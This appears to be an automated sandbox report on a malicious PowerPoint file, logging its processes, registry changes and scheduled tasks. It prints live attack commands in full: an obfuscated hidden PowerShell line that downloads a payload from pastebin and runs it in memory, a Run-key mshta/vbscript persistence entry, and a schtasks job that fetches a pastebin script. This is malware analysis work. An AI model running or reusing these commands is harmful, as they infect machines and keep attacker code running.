            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
            Source: Binary string: mscorrc.pdb source: MSBuild.exe, 00000015.00000002.1232929880.04480000.00000002.00000001.sdmp
            Source: HHS290620-024.ppt | Initial sample: OLE summary keywords = curepresentation
            Source: HHS290620-024.ppt | Initial sample: OLE document summary bytes = 0
            Source: HHS290620-024.ppt | Initial sample: OLE document summary hiddenslides = 0
            Source: HHS290620-024.ppt | Initial sample: OLE document summary mmclips = 0
            Source: HHS290620-024.ppt | Initial sample: OLE document summary notes = 0
            Source: HHS290620-024.ppt | Initial sample: OLE document summary presentationtarget = Widescreen
            Source: HHS290620-024.ppt | Initial sample: OLE document summary slides = 0

            Data Obfuscation:

            Obfuscated command line found
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/L7UDNEGk'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)
            Suspicious powershell command line found
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/L7UDNEGk'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)

            Persistence and Installation Behavior:

            Creates processes via WMI
            Source: C:\Windows\System32\mshta.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

            Boot Survival:

            Creates autostart registry keys with suspicious values (likely registry only malware)
            Source: C:\Windows\System32\mshta.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bin mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).iamresearcher)|IEX"", 0 : window.close")
            Creates multiple autostart registry keys
            Source: C:\Windows\System32\mshta.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NULL
            Source: C:\Windows\System32\mshta.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bin
            Source: C:\Windows\System32\mshta.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BACKup2
            Source: C:\Windows\System32\mshta.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BACKup3
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F

            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior